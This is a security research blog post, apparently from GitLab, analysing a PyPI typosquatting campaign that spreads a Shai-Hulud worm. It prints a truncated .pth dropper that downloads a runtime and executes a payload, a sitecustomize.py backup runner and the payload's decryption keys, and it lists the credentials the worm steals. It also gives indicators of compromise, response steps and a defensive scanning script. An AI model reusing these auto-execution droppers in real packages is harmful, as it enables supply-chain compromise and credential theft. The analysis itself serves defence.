# Shai-Hulud copycat campaign targets Python developers through PyPI typosquatting

By Dinesh Bolkensteyn and Daniel Abeles, 2026-06-09

GitLab's Vulnerability Research team has identified a coordinated supply chain attack on PyPI that deploys a copy of the [Shai-Hulud](https://about.gitlab.com/blog/gitlab-discovers-widespread-npm-supply-chain-attack/) malware. We found five malicious packages: four typosquats imitating Flask, Requests and NumPy, and one weaponized legitimate project. The packages execute code on installation, without requiring an import or a function call, and carry a self-propagating credential stealer that targets CI/CD environments across all major cloud providers.

We have confirmed that GitLab does not use any of the affected packages, and we are sharing our findings to help the broader security community respond effectively.

## How the attack unfolded

On June 7, 2026, our monitoring systems flagged five malicious PyPI packages from a single account (`elitexp`). Four are typosquats:

- **`rlask`** and **`tlask`**, typosquats of Flask
- **`rsquests`**, a typosquat of Requests
- **`nhmpy`**, a typosquat of NumPy

The fifth, **`mflux-streamlit`**, is a legitimate project with real users, which the attacker weaponized by publishing malicious versions 0.0.3 and 0.0.4 after the typosquat wave.

The attacker first published clean "probe" versions with version numbers that exactly matched the current real releases (Flask 3.1.3, Requests 2.34.2 and NumPy 2.4.6). Once these had been indexed without problems, the attacker followed up with new versions carrying the embedded worm payload.

This is a copycat deployment. TeamPCP, the group behind Shai-Hulud, [released the worm code as open source](https://ramimac.me/teampcp/) on May 12, 2026. Since then we have been tracking independent actors who pick up the toolkit and point it at new targets. This campaign brings the same worm to the Python ecosystem.

## Technical analysis

### Initial infection vector

The original npm variant used a `preinstall` script. This campaign takes a different approach and uses Python's `.pth` file mechanism. Wheel packages can ship `.pth` files, which Python processes automatically at startup, with no explicit import. Each malicious package contains a file such as `rlask-setup.pth` with a one-line dropper:

```py
import os as _O,tempfile as _T;_G=_O.path.join(_T.gettempdir(),".bun_ran");
_O.path.exists(_G)or exec('import os as _o,subprocess as _s,urllib.request as _u...')
```

The dropper checks for a marker file (`.bun_ran` in the system temp directory) to avoid running again, then downloads the Bun JavaScript runtime from GitHub and uses it to run a 5 MB obfuscated JavaScript payload bundled in the package.

Early versions of `rlask` also contained a `sitecustomize.py` file as a backup execution path. Python imports `sitecustomize` automatically at startup, and this file searched `sys.path` for the hidden `_index.js` payload:

```py
import subprocess, os, sys
for d in sys.path:
  js = os.path.join(d, "_index.js")
  if os.path.exists(js):
    subprocess.run(["node", js])
    break
```

The attacker removed this backup mechanism in later versions, apparently judging the `.pth` approach sufficient.

### Payload obfuscation

The JavaScript payload is wrapped in three layers:

1. A **ROT-N character cipher** applied to an integer array (the rotation value varies per package: ROT-13 for `rlask@3.1.4`, ROT-17 for `rsquests`, ROT-25 for `tlask`)
2. **AES-128-GCM encryption** with hardcoded keys, producing two encrypted blobs
3. Standard **variable name mangling** (`_0x` prefix obfuscation) on the inner payload

We decrypted the payload through static analysis, without executing any code. The first blob (907 bytes) is the Bun runtime downloader. The second blob (772 KB) is the complete Shai-Hulud credential stealer with 2,538 hardcoded strings.

For researchers doing their own analysis, here are the AES decryption keys:

| Layer | Key | IV |
| :--- | :--- | :--- |
| Bun downloader | `c95506221d18936328fbc7ddcd21e3dd` | `48da5faeafac0ac88a410bb0` |
| Worm payload | `7557c4e782a0622159476d1ea10d5236` | `55a7d25e0e61b77cc175bcc3` |

### Credential harvesting

Once active, the worm harvests credentials across all major cloud and CI/CD platforms:

- **GitHub Actions**: `GITHUB_TOKEN`, personal access tokens, fine-grained tokens, OIDC tokens, organization and repository secrets, Actions artifacts and runner process memory
- **AWS**: IAM access keys, secret keys, session tokens, IMDS instance credentials (`169[.]254[.]169[.]254`), Secrets Manager entries, SSM parameters, STS federation tokens
- **Azure**: client secrets, managed identity tokens, Key Vault secrets, federated credentials, Microsoft Graph API tokens
- **GCP**: service account keys, Application Default Credentials, cloud-platform scope tokens
- **HashiCorp Vault**: Vault tokens from seven known filesystem paths (`/var/run/secrets/vault-token`, `/etc/vault/token`, `/root/.vault-token` and others), plus API access and Kubernetes Vault auth
- **npm / JFrog**: npm tokens, JFrog/Artifactory API keys, OIDC token exchange
- **PyPI**: publishing tokens, OIDC mint tokens
- **RubyGems**: API keys, gem publishing credentials
- **SSH**: private keys for lateral movement
- **Kubernetes**: service account tokens, kubeconfig files
- **Sigstore**: OIDC tokens and Fulcio signing certificates, which would let the attacker sign artifacts under a trusted identity
- **Databases**: MongoDB, MySQL, PostgreSQL and Redis connection strings with embedded passwords

### Self-propagation

Like the original npm variant, this is not just a stealer. It spreads. With stolen credentials, the worm does the following:

- Commits `.github/setup.js` and workflow files to accessible GitHub repositories, causing the worm to run again in other CI pipelines
- Injects `.github/copilot-instructions.md` to poison AI coding assistants
- Publishes additional poisoned packages to PyPI, npm and RubyGems using stolen registry tokens
- Attempts privilege escalation on self-hosted CI runners by injecting sudoers rules
- Checks for [StepSecurity's harden-runner](https://github.com/step-security/harden-runner) and adjusts its behavior when it is detected

### The attacker

All five packages belong to the PyPI account `elitexp`. The account was created in November 2024 with a legitimate package (`mflux-streamlit`, a Streamlit UI for image generation with 11 stars on GitHub). The associated GitHub account (`github[.]com/elitexp`) is more than 13 years old and has 43 public repositories, including university coursework and Laravel projects.

Upload metadata shows that all packages were published with `Bun/1.3.14` as the user agent, the same runtime the malware downloads as part of its execution chain.

The attacker also weaponized `mflux-streamlit` itself. Versions 0.0.1 and 0.0.2 are clean, but **versions 0.0.3 and 0.0.4**, published at 15:23 and 15:37 UTC after the typosquat campaign, contain the same `.pth` dropper and obfuscated payload. That makes the attack more dangerous than a typical typosquat: `mflux-streamlit` is a real project with existing users who could receive the poisoned update through normal dependency resolution.

## Indicators of Compromise

| Type | Indicator | Description |
| :--- | :--- | :--- |
| package | `rlask` 3.1.4-3.1.7 | Malicious Flask typosquat |
| package | `tlask` 3.1.4 | Malicious Flask typosquat |
| package | `rsquests` 2.34.3 | Malicious Requests typosquat |
| package | `nhmpy` 2.4.7 | Malicious NumPy typosquat |
| package | `mflux-streamlit` 0.0.3, 0.0.4 | Weaponized legitimate package |
| file | `{package}-setup.pth` | Auto-executing dropper (SHA256: `6506d317...`) |
| file | `sitecustomize.py` | Backup auto-execution (present in `rlask` only) |
| file | `{package}/_index.js` | Obfuscated worm payload (5.2MB) |
| file | `.bun_ran` | Execution marker in system temp directory |
| network | `hxxps[://]github[.]com/oven-sh/bun/releases/download/bun-v1.3.13/bun-{os}-{arch}.zip` | Bun runtime download |
| network | `hxxps[://]upload[.]pypi[.]org/legacy/` | Worm publishes poisoned PyPI packages |
| network | `hxxp[://]169[.]254[.]169[.]254/latest/meta-data/iam/security-credentials/` | AWS IMDS credential theft |
| network | `hxxps[://]login[.]microsoftonline[.]com/` | Azure AD token acquisition |
| network | `hxxps[://]fulcio[.]sigstore[.]dev` | Sigstore certificate request |
| actor | `elitexp` (PyPI) | Package owner |
| actor | `Bun/1.3.14` | Upload user-agent |

## Response steps if compromised

If any of these packages was installed in your environment:

1. Remove the package immediately and look for the marker file `.bun_ran` in the system temp directory.
2. Rotate all credentials that were accessible in the environment where the package was installed. This includes CI/CD tokens, cloud provider credentials, SSH keys and registry publishing tokens.
3. Check GitHub repositories for unexpected commits, in particular files such as `.github/setup.js`, `.github/copilot-instructions.md` or modified workflow files.
4. Check package registry accounts (PyPI, npm, RubyGems) for packages you did not publish yourself.
5. Review CI/CD pipeline logs for unexpected Bun downloads or JavaScript executions.

## Timeline

| Date | Event |
| :--- | :--- |
| 2026-05-12 | TeamPCP releases the Shai-Hulud worm as open source |
| 2026-06-07 13:47 UTC | Probe versions published (`rlask@3.1.3`, `rsquests@2.34.2`) |
| 2026-06-07 14:20 UTC | First malicious version (`rlask@3.1.4`), detected within 28 seconds |
| 2026-06-07 14:24 UTC | Automated analysis completed, flagged as malicious/critical |
| 2026-06-07 14:27-15:04 UTC | Six more malicious versions published across all four package names |
| 2026-06-07 15:23-15:37 UTC | Attacker weaponizes own legitimate `mflux-streamlit` package (v0.0.3, v0.0.4) |
| 2026-06-07 | Investigation confirms the full Shai-Hulud worm through static analysis |
| 2026-06-07 16:01 UTC | All malicious packages reported to the PyPI security team |
| 2026-06-08 03:15:06 UTC | Advisory added to the [GitLab Advisory Database](https://advisories.gitlab.com/) |
| 2026-06-08 | PyPI removes all releases of the malicious packages |

## How GitLab helps with detection

If you use GitLab Ultimate, [Dependency Scanning](https://docs.gitlab.com/ee/user/application_security/dependency_scanning/) can automatically surface exposure to these packages in your projects. We have submitted advisories (GMS-2026-572 through GMS-2026-576) for all five packages to the [GitLab Advisory Database](https://advisories.gitlab.com/). Once merged, every project with Dependency Scanning enabled will flag these packages in pipeline results and in the vulnerability report.

For teams managing many repositories, [GitLab Duo Chat](https://docs.gitlab.com/ee/user/gitlab_duo_chat/) with the Security Analyst Agent can support rapid triage. Possible questions:

- "Are any of my dependencies affected by the Shai-Hulud PyPI campaign?"
- "Does this project have any malicious Python dependencies?"

## Looking ahead

We expected this campaign after TeamPCP released the Shai-Hulud worm as open source in May. Independent actors are picking up the toolkit and deploying it against new ecosystems. The Python variant uses a different initial infection vector (`.pth` files instead of `preinstall` scripts) but carries the same credential harvesting and self-propagation code underneath.

Our monitoring systems continue to track copycat deployments across npm, PyPI and other registries. We will update this post as more information becomes available.

> More articles from the Vulnerability Research team are on the [Security Labs site](https://about.gitlab.com/de-de/blog/categories/security-labs/).
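Added example (not GitLab's tooling and not code from the original post): a read-only sweep of one site-packages directory for the file and package indicators from the infection-vector section and the IoC table. It relies on the `site` module behaviour that only `.pth` lines beginning with `import` are executed; the sample tree, the `vendor-hook.pth` name and the severity labels are constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Name/version pairs from the IoC table ("rlask 3.1.4-3.1.7" written out).
MALICIOUS = {
    "rlask": {"3.1.4", "3.1.5", "3.1.6", "3.1.7"},
    "tlask": {"3.1.4"},
    "rsquests": {"2.34.3"},
    "nhmpy": {"2.4.7"},
    "mflux-streamlit": {"0.0.3", "0.0.4"},
}
# Substrings visible in the dropper line quoted in the post.
DROPPER_TOKENS = ("exec(", "subprocess", "urllib", ".bun_ran")
MARKER = ".bun_ran"


def executable_pth_lines(pth):
    """Lines that site.py passes to exec(): those starting with 'import'."""
    text = pth.read_text(encoding="utf-8", errors="replace")
    return [ln for ln in text.splitlines() if ln.startswith(("import ", "import\t"))]


def normalize(name):
    """PEP 503 normalisation, so 'mflux_streamlit' matches 'mflux-streamlit'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def scan_site_dir(site_dir):
    """Return (severity, relative path, reason) findings for one site directory."""
    findings = []
    for pth in sorted(site_dir.glob("*.pth")):
        lines = executable_pth_lines(pth)
        if not lines:
            continue  # only path entries, nothing is executed
        hits = [t for t in DROPPER_TOKENS if any(t in ln for ln in lines)]
        if hits or pth.name.endswith("-setup.pth"):
            why = "executable .pth line: " + ", ".join(hits or ["IoC file name"])
            findings.append(("high", pth.name, why))
        else:
            # Legitimate tools also ship import lines, so this needs a human look.
            findings.append(("review", pth.name, "executable .pth line"))
    if (site_dir / "sitecustomize.py").is_file():
        findings.append(("review", "sitecustomize.py", "imported at every startup"))
    for js in sorted(site_dir.glob("*/_index.js")):
        findings.append(("high", js.relative_to(site_dir).as_posix(), "payload file name"))
    # Installed distributions appear as <name>-<version>.dist-info directories.
    for info in sorted(site_dir.glob("*.dist-info")):
        name, _, version = info.name[: -len(".dist-info")].rpartition("-")
        if version in MALICIOUS.get(normalize(name), ()):
            findings.append(("high", info.name, "name and version in IoC table"))
    return findings


def marker_present(tmp_dir=None):
    """True if the dropper's run-once marker exists in the temp directory."""
    return Path(tmp_dir or tempfile.gettempdir(), MARKER).exists()


def build_sample(root):
    """Constructed sample tree; it is never on sys.path and nothing in it runs."""
    site = root / "site-packages"
    (site / "rlask").mkdir(parents=True)
    (site / "rlask-3.1.4.dist-info").mkdir()
    (site / "flask-3.1.3.dist-info").mkdir()
    (site / "plain.pth").write_text("/opt/shared/lib\n")
    (site / "vendor-hook.pth").write_text("import os; os.environ.get('EXAMPLE')\n")
    # Same shape as the quoted dropper, with an inert body in place of the elided one.
    (site / "rlask-setup.pth").write_text(
        "import os as _O,tempfile as _T;_G=_O.path.join(_T.gettempdir(),"
        "\".bun_ran\");_O.path.exists(_G)or exec('pass')\n"
    )
    (site / "rlask" / "_index.js").write_text("// constructed placeholder\n")
    return site


def demo():
    """Scan the constructed tree and report whether the marker file exists."""
    with tempfile.TemporaryDirectory() as tmp:
        return scan_site_dir(build_sample(Path(tmp))), marker_present(tmp)


if __name__ == "__main__":
    found, marker = demo()
    for severity, path, reason in found:
        print(f"{severity:6} {path}: {reason}")
    print("marker present:", marker)
```

In an affected environment, point `scan_site_dir` at each directory returned by `site.getsitepackages()` and `site.getusersitepackages()`, and treat `review` findings as a prompt to read the file rather than as a verdict.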
icon",{"altText":1417,"config":1422},{"src":1423,"dataGaName":1420,"dataGaLocation":1415},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1758203875/gs4c8p8opsgvflgkswz9.svg",{"text":1207,"config":1425},{"href":1426,"dataGaName":1427,"dataGaLocation":1415},"https://gitlab.com/-/trial_registrations/new?glm_source=about.gitlab.com/de-de/get-started/","get started",{"freeTrial":1429,"mobileIcon":1433,"desktopIcon":1435},{"text":1430,"config":1431},"Mehr über GitLab Duo erfahren",{"href":1079,"dataGaName":1432,"dataGaLocation":1415},"gitlab duo",{"altText":1417,"config":1434},{"src":1419,"dataGaName":1420,"dataGaLocation":1415},{"altText":1417,"config":1436},{"src":1423,"dataGaName":1420,"dataGaLocation":1415},{"button":1438,"mobileIcon":1443,"desktopIcon":1445},{"text":1439,"config":1440},"/Option",{"href":1441,"dataGaName":1442,"dataGaLocation":1415},"#contact","switch",{"altText":1417,"config":1444},{"src":1419,"dataGaName":1420,"dataGaLocation":1415},{"altText":1417,"config":1446},{"src":1447,"dataGaName":1420,"dataGaLocation":1415},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1773335277/ohhpiuoxoldryzrnhfrh.png",{"freeTrial":1449,"mobileIcon":1454,"desktopIcon":1456},{"text":1450,"config":1451},"Zurück zur Preisübersicht",{"href":1194,"dataGaName":1452,"dataGaLocation":1415,"icon":1453},"back to pricing","GoBack",{"altText":1417,"config":1455},{"src":1419,"dataGaName":1420,"dataGaLocation":1415},{"altText":1417,"config":1457},{"src":1423,"dataGaName":1420,"dataGaLocation":1415},{"title":1459,"button":1460,"config":1465},"Sieh dir an, wie agentische KI die Softwarebereitstellung transformiert",{"text":1461,"config":1462},"Jetzt live bei GitLab Transcend am 10. 
Juni dabei sein",{"href":1463,"dataGaName":1464,"dataGaLocation":1043},"/de-de/events/transcend/virtual/","transcend event",{"layout":1466,"disabled":1030},"release",{"data":1468},{"text":1469,"source":1470,"edit":1476,"contribute":1481,"config":1486,"items":1491,"minimal":1697},"Git ist eine Marke von Software Freedom Conservancy und unsere Verwendung von „GitLab“ erfolgt unter Lizenz.",{"text":1471,"config":1472},"Quelltext der Seite anzeigen",{"href":1473,"dataGaName":1474,"dataGaLocation":1475},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/","page source","footer",{"text":1477,"config":1478},"Diese Seite bearbeiten",{"href":1479,"dataGaName":1480,"dataGaLocation":1475},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/content/","web ide",{"text":1482,"config":1483},"Beteilige dich",{"href":1484,"dataGaName":1485,"dataGaLocation":1475},"https://gitlab.com/gitlab-com/marketing/digital-experience/about-gitlab-com/-/blob/main/CONTRIBUTING.md/","please contribute",{"twitter":1487,"facebook":1488,"youtube":1489,"linkedin":1490},"https://x.com/gitlab","https://www.facebook.com/gitlab","https://www.youtube.com/channel/UCnMGQ8QHMAnVIsI3xJrihhg","https://www.linkedin.com/company/gitlab-com",[1492,1537,1590,1632,1663],{"title":1192,"links":1493,"subMenu":1508},[1494,1498,1503],{"text":1495,"config":1496},"Tarife anzeigen",{"href":1194,"dataGaName":1497,"dataGaLocation":1475},"view plans",{"text":1499,"config":1500},"Vorteile von Premium",{"href":1501,"dataGaName":1502,"dataGaLocation":1475},"/de-de/pricing/premium/","why premium",{"text":1504,"config":1505},"Vorteile von Ultimate",{"href":1506,"dataGaName":1507,"dataGaLocation":1475},"/de-de/pricing/ultimate/","why 
ultimate",[1509],{"title":1357,"links":1510},[1511,1513,1515,1517,1522,1527,1532],{"text":1050,"config":1512},{"href":1052,"dataGaName":1053,"dataGaLocation":1475},{"text":1367,"config":1514},{"href":1369,"dataGaName":1370,"dataGaLocation":1475},{"text":1372,"config":1516},{"href":1374,"dataGaName":1375,"dataGaLocation":1475},{"text":1518,"config":1519},"Status",{"href":1520,"dataGaName":1521,"dataGaLocation":1475},"https://status.gitlab.com/","status",{"text":1523,"config":1524},"Nutzungsbedingungen",{"href":1525,"dataGaName":1526,"dataGaLocation":1475},"/terms/","terms of use",{"text":1528,"config":1529},"Datenschutzerklärung",{"href":1530,"dataGaName":1531,"dataGaLocation":1475},"/de-de/privacy/","privacy statement",{"text":1533,"config":1534},"Cookie-Einstellungen",{"dataGaName":1535,"dataGaLocation":1475,"id":1536,"isOneTrustButton":1024},"cookie preferences","ot-sdk-btn",{"title":1090,"links":1538,"subMenu":1547},[1539,1543],{"text":1540,"config":1541},"DevSecOps-Plattform",{"href":1072,"dataGaName":1542,"dataGaLocation":1475},"devsecops platform",{"text":1544,"config":1545},"KI-unterstützte Entwicklung",{"href":1079,"dataGaName":1546,"dataGaLocation":1475},"ai-assisted development",[1548],{"title":1549,"links":1550},"Themen",[1551,1555,1560,1565,1570,1575,1580,1585],{"text":1110,"config":1552},{"href":1553,"dataGaName":1554,"dataGaLocation":1475},"/de-de/topics/ci-cd/","cicd",{"text":1556,"config":1557},"GitOps",{"href":1558,"dataGaName":1559,"dataGaLocation":1475},"/de-de/topics/gitops/","gitops",{"text":1561,"config":1562},"DevOps",{"href":1563,"dataGaName":1564,"dataGaLocation":1475},"/de-de/topics/devops/","devops",{"text":1566,"config":1567},"Versionskontrolle",{"href":1568,"dataGaName":1569,"dataGaLocation":1475},"/de-de/topics/version-control/","version 
control",{"text":1571,"config":1572},"DevSecOps",{"href":1573,"dataGaName":1574,"dataGaLocation":1475},"/de-de/topics/devsecops/","devsecops",{"text":1576,"config":1577},"Cloud-nativ",{"href":1578,"dataGaName":1579,"dataGaLocation":1475},"/de-de/topics/cloud-native/","cloud native",{"text":1581,"config":1582},"KI für das Programmieren",{"href":1583,"dataGaName":1584,"dataGaLocation":1475},"/de-de/topics/devops/ai-for-coding/","ai for coding",{"text":1586,"config":1587},"Agentische KI",{"href":1588,"dataGaName":1589,"dataGaLocation":1475},"/de-de/topics/agentic-ai/","agentic ai",{"title":1591,"links":1592},"Lösungen",[1593,1596,1598,1603,1607,1610,1613,1616,1618,1620,1622,1627],{"text":1135,"config":1594},{"href":1130,"dataGaName":1595,"dataGaLocation":1475},"Application Security Testing",{"text":1122,"config":1597},{"href":1106,"dataGaName":1107,"dataGaLocation":1475},{"text":1599,"config":1600},"Agile Entwicklung",{"href":1601,"dataGaName":1602,"dataGaLocation":1475},"/de-de/solutions/agile-delivery/","agile delivery",{"text":1604,"config":1605},"SCM",{"href":1119,"dataGaName":1606,"dataGaLocation":1475},"source code management",{"text":1110,"config":1608},{"href":1112,"dataGaName":1609,"dataGaLocation":1475},"continuous integration & delivery",{"text":1161,"config":1611},{"href":1163,"dataGaName":1612,"dataGaLocation":1475},"value stream 
management",{"text":1556,"config":1614},{"href":1615,"dataGaName":1559,"dataGaLocation":1475},"/de-de/solutions/gitops/",{"text":1174,"config":1617},{"href":1177,"dataGaName":1178,"dataGaLocation":1475},{"text":1180,"config":1619},{"href":1183,"dataGaName":1184,"dataGaLocation":1475},{"text":1186,"config":1621},{"href":1189,"dataGaName":1190,"dataGaLocation":1475},{"text":1623,"config":1624},"Bildungswesen",{"href":1625,"dataGaName":1626,"dataGaLocation":1475},"/de-de/solutions/education/","education",{"text":1628,"config":1629},"Finanzdienstleistungen",{"href":1630,"dataGaName":1631,"dataGaLocation":1475},"/de-de/solutions/finance/","financial services",{"title":1197,"links":1633},[1634,1636,1638,1640,1643,1645,1648,1650,1652,1655,1657,1659,1661],{"text":1210,"config":1635},{"href":1212,"dataGaName":1213,"dataGaLocation":1475},{"text":1215,"config":1637},{"href":1217,"dataGaName":1218,"dataGaLocation":1475},{"text":1220,"config":1639},{"href":1222,"dataGaName":1223,"dataGaLocation":1475},{"text":1225,"config":1641},{"href":1227,"dataGaName":1642,"dataGaLocation":1475},"docs",{"text":1248,"config":1644},{"href":1250,"dataGaName":1251,"dataGaLocation":1475},{"text":1646,"config":1647},"Neuigkeiten",{"href":1298,"dataGaName":1299,"dataGaLocation":1475},{"text":1243,"config":1649},{"href":1245,"dataGaName":1246,"dataGaLocation":1475},{"text":1257,"config":1651},{"href":1259,"dataGaName":1260,"dataGaLocation":1475},{"text":1653,"config":1654},"GitLab 
Services",{"href":1267,"dataGaName":1268,"dataGaLocation":1475},{"text":1270,"config":1656},{"href":1272,"dataGaName":1273,"dataGaLocation":1475},{"text":1275,"config":1658},{"href":1277,"dataGaName":1278,"dataGaLocation":1475},{"text":1280,"config":1660},{"href":1282,"dataGaName":1283,"dataGaLocation":1475},{"text":1285,"config":1662},{"href":1287,"dataGaName":1288,"dataGaLocation":1475},{"title":1664,"links":1665},"Unternehmen",[1666,1668,1670,1672,1674,1676,1681,1686,1688,1690,1692],{"text":1309,"config":1667},{"href":1311,"dataGaName":1303,"dataGaLocation":1475},{"text":1314,"config":1669},{"href":1316,"dataGaName":1317,"dataGaLocation":1475},{"text":1322,"config":1671},{"href":1324,"dataGaName":1325,"dataGaLocation":1475},{"text":1327,"config":1673},{"href":1329,"dataGaName":1330,"dataGaLocation":1475},{"text":1332,"config":1675},{"href":1334,"dataGaName":1335,"dataGaLocation":1475},{"text":1677,"config":1678},"Nachhaltigkeit",{"href":1679,"dataGaName":1680,"dataGaLocation":1475},"/sustainability/","Sustainability",{"text":1682,"config":1683},"Vielfalt, Inklusion und Zugehörigkeit",{"href":1684,"dataGaName":1685,"dataGaLocation":1475},"/de-de/diversity-inclusion-belonging/","Diversity, inclusion and belonging",{"text":1337,"config":1687},{"href":1339,"dataGaName":1340,"dataGaLocation":1475},{"text":1347,"config":1689},{"href":1349,"dataGaName":1350,"dataGaLocation":1475},{"text":1352,"config":1691},{"href":1354,"dataGaName":1355,"dataGaLocation":1475},{"text":1693,"config":1694},"Transparenzerklärung zu moderner Sklaverei",{"href":1695,"dataGaName":1696,"dataGaLocation":1475},"https://handbook.gitlab.com/handbook/legal/modern-slavery-act-transparency-statement/","modern slavery transparency 
statement",{"items":1698},[1699,1701,1704],{"text":1523,"config":1700},{"href":1525,"dataGaName":1526,"dataGaLocation":1475},{"text":1702,"config":1703},"Cookies",{"dataGaName":1535,"dataGaLocation":1475,"id":1536,"isOneTrustButton":1024},{"text":1528,"config":1705},{"href":1530,"dataGaName":1531,"dataGaLocation":1475},[1707,1721],{"id":1708,"title":7,"body":1023,"config":1709,"content":1711,"description":1023,"extension":1715,"meta":1716,"navigation":1024,"path":1717,"seo":1718,"stem":1719,"__hash__":1720},"blogAuthors/en-us/blog/authors/dinesh-bolkensteyn.yml",{"template":1710},"BlogAuthor",{"name":7,"config":1712},{"headshot":1713,"ctfId":1714},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1781016491/cs30c757njvhqnyizzmn.jpg","EpylYWgjPmFOL5NX3Zxmk","yml",{},"/en-us/blog/authors/dinesh-bolkensteyn",{},"en-us/blog/authors/dinesh-bolkensteyn","Pv3nFIJV4WoNXz6FcpkaLOBx8QTtXH1KIVGmxt1GGME",{"id":1722,"title":8,"body":1023,"config":1723,"content":1725,"description":1023,"extension":1715,"meta":1728,"navigation":1024,"path":1729,"seo":1730,"stem":1731,"__hash__":1732},"blogAuthors/en-us/blog/authors/daniel-abeles.yml",{"template":1710,"gitlabHandle":1724},"dabeles",{"name":8,"config":1726},{"headshot":1727},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1764021550/s0jlolynjykik4qzfznr.png",{},"/en-us/blog/authors/daniel-abeles",{},"en-us/blog/authors/daniel-abeles","Jk9qNn2qJBh633zCEZSFpYFUYNt83twJ-Ge9wrn_oT0",[1734,1743,1750],{"title":1735,"description":1736,"heroImage":1737,"category":1019,"date":1738,"authors":1739,"slug":1742,"externalUrl":1023},"Contagious Interview: IDE-Angriffe erkennen und verhindern","Benutzerdefinierte Kontrollen zur Erkennung und Prävention von Malware-Kampagnen wie Contagious Interview – und Deployment in der eigenen Umgebung.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1774375772/kpaaaiqhokevxxeoxvu0.png","2026-05-04",[1740,1741],"Josh Feehs","Austin 
Bollinger","how-to-detect-and-prevent-contagious-interview-ide-attacks",{"title":1744,"description":1745,"heroImage":1025,"category":1019,"date":1746,"authors":1747,"slug":1749,"externalUrl":1023},"Pipeline-Sicherheit: Lehren aus den Supply-Chain-Angriffen im März","Erfahre, wie zentrale Pipeline-Policies die Angriffsmuster hinter einer Reihe aktueller Supply-Chain-Attacken erkennen und blockieren können.","2026-04-07",[1748],"Grant Hickman","pipeline-security-lessons-from-march-supply-chain-incidents",{"title":1751,"description":1752,"heroImage":1753,"category":1019,"date":1754,"authors":1755,"slug":1757,"externalUrl":1023},"Detection-Gaps automatisch analysieren mit GitLab Duo Agent Platform","GitLab zeigt, wie zwei KI-Agenten die Gap-Analyse nach Sicherheitsvorfällen reproduzierbar und konsistent machen – direkt im GitLab-Workflow.","https://res.cloudinary.com/about-gitlab-com/image/upload/v1773147991/op5xyroonltdwqix0x3u.png","2026-03-10",[1756],"Matt Coons","automating-detection-gap-analysis-with-gitlab-duo-agent-platform",{"promotions":1759},[1760,1774,1786,1797],{"id":1761,"categories":1762,"header":1764,"text":1765,"button":1766,"image":1771},"ai-modernization",[1763],"ai","Hält KI, was uns versprochen wurde?","Das Quiz dauert maximal 5 Minuten.",{"text":1767,"config":1768},"Ermittle deinen KI-Reifegrad",{"href":1769,"dataGaName":1770,"dataGaLocation":1251},"/de-de/assessments/ai-modernization-assessment/","modernization assessment",{"config":1772},{"src":1773},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138786/qix0m7kwnd8x2fh1zq49.png",{"id":1775,"categories":1776,"header":1778,"text":1765,"button":1779,"image":1783},"devops-modernization",[1777,1574],"product","Verwaltest du Tool-Chaos oder stellst du Innovationen bereit?",{"text":1780,"config":1781},"Ermittle deinen 
DevOps-Reifegrad",{"href":1782,"dataGaName":1770,"dataGaLocation":1251},"/de-de/assessments/devops-modernization-assessment/",{"config":1784},{"src":1785},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138785/eg818fmakweyuznttgid.png",{"id":1787,"categories":1788,"header":1789,"text":1765,"button":1790,"image":1794},"security-modernization",[1034],"Tauschst du Schnelligkeit gegen Sicherheit ein?",{"text":1791,"config":1792},"Ermittle deinen Sicherheitsreifegrad",{"href":1793,"dataGaName":1770,"dataGaLocation":1251},"/de-de/assessments/security-modernization-assessment/",{"config":1795},{"src":1796},"https://res.cloudinary.com/about-gitlab-com/image/upload/v1772138786/p4pbqd9nnjejg5ds6mdk.png",{"id":1798,"paths":1799,"header":1802,"text":1803,"button":1804,"image":1809},"github-azure-migration",[1800,1801],"migration-from-azure-devops-to-gitlab","integrating-azure-devops-scm-and-gitlab","Ist dein Team bereit für den Umzug von GitHub nach Azure?","GitHub stellt bereits auf Azure um. Finde heraus, was das für dich bedeutet.",{"text":1805,"config":1806},"Erfahre, wie GitLab im Vergleich zu GitHub abschneidet",{"href":1807,"dataGaName":1808,"dataGaLocation":1251},"/de-de/compare/gitlab-vs-github/github-azure-migration/","github azure migration",{"config":1810},{"src":1785},{"header":1812,"blurb":1813,"button":1814,"secondaryButton":1819},"Beginne noch heute, schneller zu entwickeln","Entdecke, was dein Team mit der intelligenten Orchestrierungsplattform für DevSecOps erreichen kann.\n",{"text":1815,"config":1816},"Kostenlosen Test starten",{"href":1817,"dataGaName":1048,"dataGaLocation":1818},"https://gitlab.com/-/trial_registrations/new?glm_content=default-saas-trial&glm_source=about.gitlab.com/de-de/","feature",{"text":1050,"config":1820},{"href":1052,"dataGaName":1053,"dataGaLocation":1818},1781392741957]